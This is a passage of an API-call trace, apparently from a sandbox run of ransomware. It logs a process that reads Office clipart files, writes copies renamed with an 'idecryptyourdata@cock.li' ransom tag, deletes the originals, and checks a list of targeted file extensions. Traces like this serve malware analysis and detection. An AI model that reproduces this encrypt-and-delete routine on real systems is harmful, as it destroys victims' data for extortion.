liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.037] SetEndOfFile (hFile=0x368) returned 1 [0062.038] CloseHandle (hObject=0x368) returned 1 [0062.038] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01174_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0062.038] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01174_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01174_.wmf")) returned 1 [0062.039] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 68 [0062.039] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 68 [0062.039] lstrlenW (lpString=".doc") returned 4 [0062.039] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0062.039] lstrlenW (lpString=".docx") returned 5 [0062.039] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0062.039] lstrlenW (lpString=".pdf") returned 4 [0062.039] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0062.039] lstrlenW (lpString=".xls") returned 4 [0062.039] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0062.039] lstrlenW (lpString=".xlsx") returned 5 [0062.039] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0062.039] lstrlenW (lpString=".ppt") returned 4 [0062.039] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0062.039] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 68 [0062.039] lstrlenW (lpString=".zip") returned 4 [0062.039] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0062.039] lstrlenW (lpString=".rar") returned 4 [0062.039] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0062.039] lstrlenW (lpString=".bz2") returned 4 [0062.039] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0062.039] lstrlenW (lpString=".7z") returned 3 [0062.039] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0062.039] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 68 [0062.039] lstrlenW (lpString=".dbf") returned 4 [0062.039] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0062.039] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 68 [0062.040] lstrlenW (lpString=".1cd") returned 4 [0062.040] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0062.040] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 68 [0062.040] lstrlenW (lpString=".jpg") returned 4 [0062.040] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0062.040] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 68 [0062.040] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 68 [0062.040] lstrlenW (lpString=".doc") returned 4 [0062.040] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0062.040] lstrlenW (lpString=".docx") returned 5 [0062.040] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0062.040] lstrlenW (lpString=".pdf") returned 4 [0062.040] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0062.040] lstrlenW (lpString=".xls") returned 4 [0062.040] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0062.040] lstrlenW (lpString=".xlsx") returned 5 [0062.040] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0062.040] lstrlenW (lpString=".ppt") returned 4 [0062.040] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0062.040] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 68 [0062.040] lstrlenW (lpString=".zip") returned 4 [0062.040] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0062.040] lstrlenW (lpString=".rar") returned 4 [0062.040] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0062.040] lstrlenW (lpString=".bz2") returned 4 [0062.040] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0062.040] lstrlenW (lpString=".7z") returned 3 [0062.040] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0062.040] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 68 [0062.040] lstrlenW (lpString=".dbf") returned 4 [0062.040] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0062.040] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 68 [0062.041] lstrlenW (lpString=".1cd") returned 4 [0062.041] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0062.041] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 68 [0062.041] lstrlenW (lpString=".jpg") returned 4 [0062.041] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0062.041] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0062.041] lstrlenW (lpString="AN01218_.WMF") returned 12 [0062.041] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01218_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01218_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0062.041] GetFileSizeEx (in: hFile=0x368, lpFileSize=0x268ff14 | out: lpFileSize=0x268ff14*=3012) returned 1 [0062.041] CloseHandle (hObject=0x368) returned 1 [0062.041] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01218_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01218_.wmf")) returned 0x220 [0062.041] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01218_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01218_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0062.041] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01218_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01218_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0062.041] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.042] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.042] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01218_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01218_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0062.042] GetLastError () returned 0x0 [0062.042] ReadFile (in: hFile=0x368, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0xbc4, lpOverlapped=0x0) returned 1 [0062.060] WriteFile (in: hFile=0x370, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xbd0, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xbd0, lpOverlapped=0x0) returned 1 [0062.061] ReadFile (in: hFile=0x368, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0062.061] WriteFile (in: hFile=0x370, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0062.061] SetEndOfFile (hFile=0x370) returned 1 [0062.062] CloseHandle (hObject=0x370) returned 1 [0062.062] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.062] SetEndOfFile (hFile=0x368) returned 1 [0062.063] CloseHandle (hObject=0x368) returned 1 [0062.063] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01218_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0062.063] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01218_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01218_.wmf")) returned 1 [0062.064] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 68 [0062.064] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 68 [0062.064] lstrlenW (lpString=".doc") returned 4 [0062.064] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0062.064] lstrlenW (lpString=".docx") returned 5 [0062.064] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0062.064] lstrlenW (lpString=".pdf") returned 4 [0062.064] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0062.064] lstrlenW (lpString=".xls") returned 4 [0062.064] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0062.064] lstrlenW (lpString=".xlsx") returned 5 [0062.064] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0062.064] lstrlenW (lpString=".ppt") returned 4 [0062.064] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0062.064] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 68 [0062.064] lstrlenW (lpString=".zip") returned 4 [0062.064] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0062.064] lstrlenW (lpString=".rar") returned 4 [0062.064] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0062.064] lstrlenW (lpString=".bz2") returned 4 [0062.064] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0062.064] lstrlenW (lpString=".7z") returned 3 [0062.064] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0062.064] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 68 [0062.064] lstrlenW (lpString=".dbf") returned 4 [0062.064] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0062.064] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 68 [0062.064] lstrlenW (lpString=".1cd") returned 4 [0062.064] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0062.064] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 68 [0062.064] lstrlenW (lpString=".jpg") returned 4 [0062.064] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0062.065] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 68 [0062.065] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 68 [0062.065] lstrlenW (lpString=".doc") returned 4 [0062.065] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0062.065] lstrlenW (lpString=".docx") returned 5 [0062.065] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0062.065] lstrlenW (lpString=".pdf") returned 4 [0062.065] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0062.065] lstrlenW (lpString=".xls") returned 4 [0062.065] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0062.065] lstrlenW (lpString=".xlsx") returned 5 [0062.065] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0062.065] lstrlenW (lpString=".ppt") returned 4 [0062.065] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0062.065] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 68 [0062.065] lstrlenW (lpString=".zip") returned 4 [0062.065] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0062.065] lstrlenW (lpString=".rar") returned 4 [0062.065] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0062.065] lstrlenW (lpString=".bz2") returned 4 [0062.065] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0062.065] lstrlenW (lpString=".7z") returned 3 [0062.065] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0062.065] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 68 [0062.065] lstrlenW (lpString=".dbf") returned 4 [0062.065] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0062.065] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 68 [0062.065] lstrlenW (lpString=".1cd") returned 4 [0062.065] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0062.065] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 68 [0062.065] lstrlenW (lpString=".jpg") returned 4 [0062.065] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0062.066] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0062.066] lstrlenW (lpString="AN02122_.WMF") returned 12 [0062.066] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02122_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an02122_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0062.075] GetFileSizeEx (in: hFile=0x368, lpFileSize=0x268ff14 | out: lpFileSize=0x268ff14*=7540) returned 1 [0062.075] CloseHandle (hObject=0x368) returned 1 [0062.075] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02122_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an02122_.wmf")) returned 0x220 [0062.076] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02122_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an02122_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0062.076] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02122_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an02122_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0062.076] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.076] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.076] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02122_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an02122_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0062.076] GetLastError () returned 0x0 [0062.076] ReadFile (in: hFile=0x368, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x1d74, lpOverlapped=0x0) returned 1 [0062.099] WriteFile (in: hFile=0x370, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x1d80, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x1d80, lpOverlapped=0x0) returned 1 [0062.100] ReadFile (in: hFile=0x368, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0062.100] WriteFile (in: hFile=0x370, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0062.100] SetEndOfFile (hFile=0x370) returned 1 [0062.100] CloseHandle (hObject=0x370) returned 1 [0062.101] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.101] SetEndOfFile (hFile=0x368) returned 1 [0062.102] CloseHandle (hObject=0x368) returned 1 [0062.102] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02122_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0062.102] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02122_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an02122_.wmf")) returned 1 [0062.103] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 68 [0062.103] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 68 [0062.103] lstrlenW (lpString=".doc") returned 4 [0062.103] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0062.103] lstrlenW (lpString=".docx") returned 5 [0062.103] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0062.103] lstrlenW (lpString=".pdf") returned 4 [0062.103] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0062.103] lstrlenW (lpString=".xls") returned 4 [0062.103] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0062.103] lstrlenW (lpString=".xlsx") returned 5 [0062.103] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0062.103] lstrlenW (lpString=".ppt") returned 4 [0062.103] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0062.103] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 68 [0062.103] lstrlenW (lpString=".zip") returned 4 [0062.103] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0062.103] lstrlenW (lpString=".rar") returned 4 [0062.103] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0062.103] lstrlenW (lpString=".bz2") returned 4 [0062.103] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0062.103] lstrlenW (lpString=".7z") returned 3 [0062.103] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0062.103] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 68 [0062.104] lstrlenW (lpString=".dbf") returned 4 [0062.104] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0062.104] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 68 [0062.104] lstrlenW (lpString=".1cd") returned 4 [0062.104] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0062.104] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 68 [0062.104] lstrlenW (lpString=".jpg") returned 4 [0062.104] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0062.104] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 68 [0062.104] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 68 [0062.104] lstrlenW (lpString=".doc") returned 4 [0062.104] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0062.104] lstrlenW (lpString=".docx") returned 5 [0062.104] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0062.104] lstrlenW (lpString=".pdf") returned 4 [0062.104] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0062.104] lstrlenW (lpString=".xls") returned 4 [0062.104] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0062.104] lstrlenW (lpString=".xlsx") returned 5 [0062.104] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0062.104] lstrlenW (lpString=".ppt") returned 4 [0062.104] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0062.104] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 68 [0062.104] lstrlenW (lpString=".zip") returned 4 [0062.104] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0062.104] lstrlenW (lpString=".rar") returned 4 [0062.104] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0062.105] lstrlenW (lpString=".bz2") returned 4 [0062.105] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0062.105] lstrlenW (lpString=".7z") returned 3 [0062.105] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0062.105] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 68 [0062.105] lstrlenW (lpString=".dbf") returned 4 [0062.105] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0062.105] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 68 [0062.105] lstrlenW (lpString=".1cd") returned 4 [0062.105] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0062.105] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 68 [0062.105] lstrlenW (lpString=".jpg") returned 4 [0062.105] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0062.105] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0062.105] lstrlenW (lpString="AN02724_.WMF") returned 12 [0062.105] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02724_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an02724_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0062.105] GetFileSizeEx (in: hFile=0x368, lpFileSize=0x268ff14 | out: lpFileSize=0x268ff14*=2108) returned 1 [0062.105] CloseHandle (hObject=0x368) returned 1 [0062.106] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02724_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an02724_.wmf")) returned 0x220 [0062.106] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02724_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an02724_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0062.106] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02724_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an02724_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0062.106] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.106] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.106] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02724_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an02724_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0062.106] GetLastError () returned 0x0 [0062.106] ReadFile (in: hFile=0x368, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x83c, lpOverlapped=0x0) returned 1 [0062.138] WriteFile (in: hFile=0x370, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x840, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x840, lpOverlapped=0x0) returned 1 [0062.139] ReadFile (in: hFile=0x368, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0062.139] WriteFile (in: hFile=0x370, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0062.139] SetEndOfFile (hFile=0x370) returned 1 [0062.139] CloseHandle (hObject=0x370) returned 1 [0062.140] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.140] SetEndOfFile (hFile=0x368) returned 1 [0062.141] CloseHandle (hObject=0x368) returned 1 [0062.141] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02724_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0062.141] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02724_.WMF" (normalized: "c:\\program files\\microsoft 